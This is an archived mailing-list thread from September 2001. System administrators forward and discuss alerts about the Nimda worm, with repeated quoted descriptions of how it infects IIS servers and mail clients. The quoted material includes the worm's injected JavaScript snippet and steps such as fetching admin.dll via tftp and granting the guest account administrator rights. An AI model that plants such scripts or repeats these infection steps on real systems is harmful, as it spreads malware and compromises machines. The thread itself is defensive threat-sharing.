RE: FW: Worm probes
Title: RE: FW: Worm probes From Panda (note they won't have a sig file for a few hours yet): Panda Software alerts users on the appearance of W32/Nimda.A@mm (alias Nimda), possibly originated in China, which spreads through the e-mail and is automatically executed simply by previewing the message that contains it. To perform the infection it exploits a vulnerability discovered by the security expert Juan Carlos García Cuartango in Internet Explorer 5 browser, as well as Outlook and Outlook Express mail clients. This flaw allows for the automatic and immediate execution of files. This means no action, such as double-clicking the attached file, is necessary for the virus to be activated. However, it requires that the 'preview' option is enabled in the mail clients for the vulnerability to be exploited and README.EXE, the virus filename, to be executed. Due to this threat, Panda Software recommends to follow up the news appearing in the specialised media. It also warns against opening the mail client before the anti-virus is updated with the corresponding pav.sig, which will be made available to all users by the European multinational in the next few hours, together with the additional info about the virus. -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 18, 2001 12:21 PM To: NT System Admin Issues Subject: Fw: FW: Worm probes Here's one from a thread on nanog HTH, Geoff - Original Message - From: Jim Olsen [EMAIL PROTECTED] To: [EMAIL PROTECTED] Sent: Tuesday, September 18, 2001 11:03 AM Subject: Re: FW: Worm probes This is the information i've collected thus far on W32.nimda: W32.nimda is NOT a code red variant, and the people who referring to it as Code Blue were mistaken... The name it has been given (at least by TruSecure) is W32.nimda.a.mm. It uses several vulnerabilities in Windows NT and 2000 server's to infect a server, and also employ's email and web site mobile code to infect Windows 9x/ME/NT/2k boxes. During the initial infection of a server, the worm does the following: - download a file named admin.dll via tftp from the system that is trying to infect the target - add the guest account to the local administrators group and activates the account - makes sure c$ is shared out - copies itself to c, d, and e drives - tries to mail itself to email addresses that it discovers on the server - creates a file named readme.exe, which is used in the mobile code inserted on the web sites below - add this string to the web pages found on the server: htmlscript language=JavaScriptwindow.open(readme.eml, null, resizable=no,top=6000,left=6000)/script/html - scans for and infects other vulnerable IIS servers - goes through all shared directories and puts sample.nws, sample.eml, desktop.eml, desktop.nws in each directory. these are eml messages with copies of itself (readme.exe) autoloaded by the mobile html code mentioned above. - goes through all shared directories and puts riched20.dll in each directory, which is a trogan dll version of W32.nimda that is meant to infect people running notepad/wordpad in that directory. - puts a trojan mmc.exe in the winnt directory that is a copy of itself in the above readme.exe format (win2000 only) If a user views a web site that is hosted on an infected server, the following happens: - upon viewing an infected page, the mobile code extracts to readme.exe and starts in windows media player (without user intervention) - the user's machine becomes infected with W32.nimda at this point and time - the worm starts scanning for other vulnerable IIS servers - the worm emails itself to everyone on the user's address book - goes through all shared directories and puts sample.nws, sample.eml, desktop.eml, desktop.nws in each directory. these are eml messages with copies of itself (readme.exe) autoloaded by the mobile html code mentioned above. - goes through all shared directories and puts riched20.dll in each directory, which is a trogjan dll version of W32.nimda that is meant to infect people running notepad/wordpad in that directory. - puts a trojan mmc.exe in the winnt directory that is a copy of itself in the above readme.exe format (win2000 only) It us unknown to me what happens (at this point in time) if a user opens an attachment that is sent from an infected site. It is possible that it could automatically infect the user's computer using the same methods mentioned above. EVERYONE who uses internet explorer to browse the internet should probably do one of two things to stop from being automatically infected by W32.nimda (i have not tested whether or not turning off javascript fixes the problem): o) don't browse web pages until microsoft releases a patch o) turn OFF javascript EVERYONE who uses outlook/outlook express should, at the very least, not open any attachments that they are not expecting. Turning off auto-preview
RE: FW: Worm probes
Title: RE: FW: Worm probes
reg
hack to not execute perhaps?
-Original Message-From: John Cesta - Lists
[mailto:[EMAIL PROTECTED]]Sent: Tuesday, September 18, 2001 12:57
PMTo: NT System Admin IssuesSubject: RE: FW: Worm
probes
-Original Message-From:
[EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED]]Sent: Tuesday, September 18,
2001 3:26 PMTo: NT System Admin IssuesSubject: RE: FW:
Worm probes
From Panda (note they won't have a sig file for a few hours
yet): Panda Software alerts users on the appearance
of W32/Nimda.A@mm (alias Nimda), possibly originated in China, which spreads
through the e-mail and is automatically executed simply by previewing the
message that contains it.
To perform the infection it exploits a vulnerability
discovered by the security expert Juan Carlos García Cuartango in Internet
Explorer 5 browser, as well as Outlook and Outlook Express mail clients.
This flaw allows for the automatic and immediate execution of files. This
means no action, such as double-clicking the attached file, is necessary for
the virus to be activated. However, it requires that the 'preview' option is
enabled in the mail clients for the vulnerability to be exploited and
README.EXE, the virus filename, to be executed.
I am not so sure thatthis assessment is entirely
correct. For example, in my situation, I have a PC with Outlook2000
and preview mode enabled. What I get is that when I click on the email a
dialog box opens and prompts whether or not Iwish to save the file to
disk - the README.EXE file that is.I just click cancel and then delete the
email. I do not contract the virus.
John
Due to this threat, Panda Software recommends to follow up
the news appearing in the specialised media. It also warns against opening
the mail client before the anti-virus is updated with the corresponding
pav.sig, which will be made available to all users by the European
multinational in the next few hours, together with the additional info about
the virus.
-Original Message- From:
[EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 18, 2001 12:21 PM To: NT System Admin Issues Subject: Fw: FW:
Worm probes
Here's one from a thread on nanog
HTH,
Geoff
- Original Message - From:
"Jim Olsen" [EMAIL PROTECTED] To:
[EMAIL PROTECTED] Sent: Tuesday, September 18,
2001 11:03 AM Subject: Re: FW: Worm probes
This is the information
i've collected thus far on W32.nimda:
W32.nimda is NOT a code red variant, and the people
who referring to it as "Code Blue" were
mistaken... The
name it has been given (at least by TruSecure) is W32.nimda.a.mm. It
uses several vulnerabilities
in Windows NT and 2000 server's to infect a server, and also employ's email and web
site mobile code to infect Windows 9x/ME/NT/2k
boxes. During the
initial infection of a server, the worm does the following: - download a
file named "admin.dll" via tftp from the system that is trying to infect the target
- add
the guest account to the local administrators group and activates the account - makes sure c$
is shared out - copies itself
to c, d, and e drives - tries to mail
itself to email addresses that it discovers on the server - creates a file
named readme.exe, which is used in the mobile code inserted on the web sites
below - add this
string to the web pages found on the server:
htmlscript language="JavaScript"window.open("readme.eml",
null,
"resizable=no,top=6000,left=6000")/script/html
-
scans for and infects other vulnerable IIS servers - goes through
all shared directories and puts sample.nws,
sample.eml, desktop.eml, desktop.nws in each directory. these are eml
messages with copies of itself (readme.exe) autoloaded
by the mobile html code mentioned above.
- goes
through all shared directories and puts riched20.dll in each directory, which is a trogan dll
version of W32.nimda that is meant to infect
people running notepad/wordpad in that directory. - puts a trojan
mmc.exe in the winnt directory that is a copy of itself in the above "readme.exe" format (win2000 only)
If a user views a web
site that is hosted on an infected server, the
following happens: - upon viewing
an infected page, the mobile code extracts to
readme.exe and starts in windows media player (without user
intervention) - the user's
machine becomes infected with W32.nimda at this point and time - the worm
starts scanning for other vulnerable IIS servers - the worm
emails itself to everyone on the us
RE: FW: Worm probes
Title: RE: FW: Worm probes
Name: Nimda
Alias: W32/Nimda
Virus Categories: WORM (E-MAIL)
Virus Families: W32 GROUP
Repairable: Yes
Date of Appearance: 09/18/2001
Included in the "Wild List": No
Activation Condition
Basic Information: W32/Nimda is a worm that spreads by e-mail and exploits a
vulnerability in Windows98 and Windows2000 that makes it possible to run
Audio/X-wav files through Windows Explorer. To ensure its propagation, this worm
sends out a message that includes an attachment with the following name:
README.EXE. This file pretends to be an Audio/Xwav file coded in Base64 format.
After being decoded, the executable file that contains the worm is 57344 bytes
long.
One of the actions carried out by this worm consists of sharing the drive C:
of the affected computer in order to spread to other network drives.
Means of Propagation This worm uses e-mail to spread to other systems. To do
this it sends out messages containing an attachment with the following name:
README.EXE.
Symptoms of Infection This worm creates several files in the Windows
temporary directory. Although the content of these files is basically very
similar to the original file, it does present certain variations. Additionally,
it creates a file called Wininit.ini in the Windows directory.
The worm is coded to download a file called Admin.dll. To do this it uses an
application called Tftp.exe. Finally, the worm creates a new user through which
it shares the C drive and attempts to spread to other network drives.
Additionally, it exploits a vulnerability in Windows98 and Windows2000 that
makes it possible to run Audio/X-wav files through Windows
Explorer.
-Original Message-From: Ray Zorz Sent:
Tuesday, September 18, 2001 12:58 PMTo: NT System Admin
IssuesSubject: RE: FW: Worm probes
reg
hack to not execute perhaps?
-Original Message-From: John Cesta - Lists
[mailto:[EMAIL PROTECTED]]Sent: Tuesday, September 18, 2001 12:57
PMTo: NT System Admin IssuesSubject: RE: FW: Worm
probes
-Original Message-From:
[EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED]]Sent: Tuesday, September
18, 2001 3:26 PMTo: NT System Admin IssuesSubject:
RE: FW: Worm probes
From Panda (note they won't have a sig file for a few
hours yet): Panda Software alerts users on the
appearance of W32/Nimda.A@mm (alias Nimda), possibly originated in China,
which spreads through the e-mail and is automatically executed simply by
previewing the message that contains it.
To perform the infection it exploits a vulnerability
discovered by the security expert Juan Carlos García Cuartango in Internet
Explorer 5 browser, as well as Outlook and Outlook Express mail clients.
This flaw allows for the automatic and immediate execution of files. This
means no action, such as double-clicking the attached file, is necessary
for the virus to be activated. However, it requires that the 'preview'
option is enabled in the mail clients for the vulnerability to be
exploited and README.EXE, the virus filename, to be executed.
I am not so sure thatthis assessment is entirely
correct. For example, in my situation, I have a PC with Outlook2000
and preview mode enabled. What I get is that when I click on the email a
dialog box opens and prompts whether or not Iwish to save the file
to disk - the README.EXE file that is.I just click cancel and then delete
the email. I do not contract the virus.
John
Due to this threat, Panda Software recommends to follow up
the news appearing in the specialised media. It also warns against opening
the mail client before the anti-virus is updated with the corresponding
pav.sig, which will be made available to all users by the European
multinational in the next few hours, together with the additional info
about the virus.
-Original Message- From:
[EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 18, 2001 12:21 PM
To: NT System Admin Issues Subject: Fw: FW: Worm probes
Here's one from a thread on nanog
HTH,
Geoff
- Original Message - From:
"Jim Olsen" [EMAIL PROTECTED] To:
[EMAIL PROTECTED] Sent: Tuesday, September
18, 2001 11:03 AM Subject: Re: FW: Worm
probes
This is the information
i've collected thus far on W32.nimda:
W32.nimda is NOT a code red variant, and the people
who referring to it as "Code Blue" were
mistaken... The
name it has been given (at least by TruSecure) is W32.nimda.a.mm.
It uses several
vulnerabilities in Windows NT and 2000 server's to infect a
server, and also employ's
email and web site mobile code
RE: FW: Worm probes
Title: RE: FW: Worm probes
-Original Message-From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED]]Sent: Tuesday, September 18,
2001 3:26 PMTo: NT System Admin IssuesSubject: RE: FW:
Worm probes
From Panda (note they won't have a sig file for a few hours
yet): Panda Software alerts users on the appearance of
W32/Nimda.A@mm (alias Nimda), possibly originated in China, which spreads
through the e-mail and is automatically executed simply by previewing the
message that contains it.
To perform the infection it exploits a vulnerability
discovered by the security expert Juan Carlos García Cuartango in Internet
Explorer 5 browser, as well as Outlook and Outlook Express mail clients. This
flaw allows for the automatic and immediate execution of files. This means no
action, such as double-clicking the attached file, is necessary for the virus
to be activated. However, it requires that the 'preview' option is enabled in
the mail clients for the vulnerability to be exploited and README.EXE, the
virus filename, to be executed.
I am not so sure thatthis assessment is entirely correct.
For example, in my situation, I have a PC with Outlook2000 and preview
mode enabled. What I get is that when I click on the email a dialog box opens
and prompts whether or not Iwish to save the file to disk - the
README.EXE file that is.I just click cancel and then delete the email. I do
not contract the virus.
John
Due to this threat, Panda Software recommends to follow up the
news appearing in the specialised media. It also warns against opening the
mail client before the anti-virus is updated with the corresponding pav.sig,
which will be made available to all users by the European multinational in the
next few hours, together with the additional info about the
virus.
-Original Message- From:
[EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 18, 2001 12:21 PM To: NT System Admin Issues Subject: Fw: FW:
Worm probes
Here's one from a thread on nanog
HTH,
Geoff
- Original Message - From:
"Jim Olsen" [EMAIL PROTECTED] To:
[EMAIL PROTECTED] Sent: Tuesday, September 18,
2001 11:03 AM Subject: Re: FW: Worm probes
This is the information i've
collected thus far on W32.nimda: W32.nimda is NOT a code red variant, and the people who referring
to it as "Code Blue" were mistaken...
The name it has been given
(at least by TruSecure) is W32.nimda.a.mm. It uses several vulnerabilities in Windows NT
and 2000 server's to infect a server, and also employ's email and web site mobile code to infect
Windows 9x/ME/NT/2k boxes. During the initial infection of a
server, the worm does the following: - download a file
named "admin.dll" via tftp from the system that is trying to infect the target
- add
the guest account to the local administrators group and activates the account - makes sure c$ is
shared out - copies itself to
c, d, and e drives - tries to mail
itself to email addresses that it discovers on the server - creates a file
named readme.exe, which is used in the mobile code inserted on the web sites
below - add this string
to the web pages found on the server:
htmlscript language="JavaScript"window.open("readme.eml",
null,
"resizable=no,top=6000,left=6000")/script/html
- scans
for and infects other vulnerable IIS servers - goes through all
shared directories and puts sample.nws,
sample.eml, desktop.eml, desktop.nws in each directory. these are eml
messages with copies of itself (readme.exe) autoloaded
by the mobile html code mentioned above.
- goes
through all shared directories and puts riched20.dll in each directory, which is a trogan dll
version of W32.nimda that is meant to infect
people running notepad/wordpad in that directory. - puts a trojan
mmc.exe in the winnt directory that is a copy of
itself in the above "readme.exe" format (win2000 only) If a user views a web site that is
hosted on an infected server, the following
happens: - upon viewing an
infected page, the mobile code extracts to
readme.exe and starts in windows media player (without user
intervention) - the user's
machine becomes infected with W32.nimda at this point and time - the worm starts
scanning for other vulnerable IIS servers - the worm emails
itself to everyone on the user's address book - goes through all
shared directories and puts sample.nws,
sample.eml, desktop.eml, desktop.nws in each directory. these are eml
messages with copies of itself (readme.exe) autoloaded
by the mobile html code mentioned above.
- goes
through all shared directories and puts riched20.dll in each directory, which is a trogjan dll
version of W32.nimda that is meant t
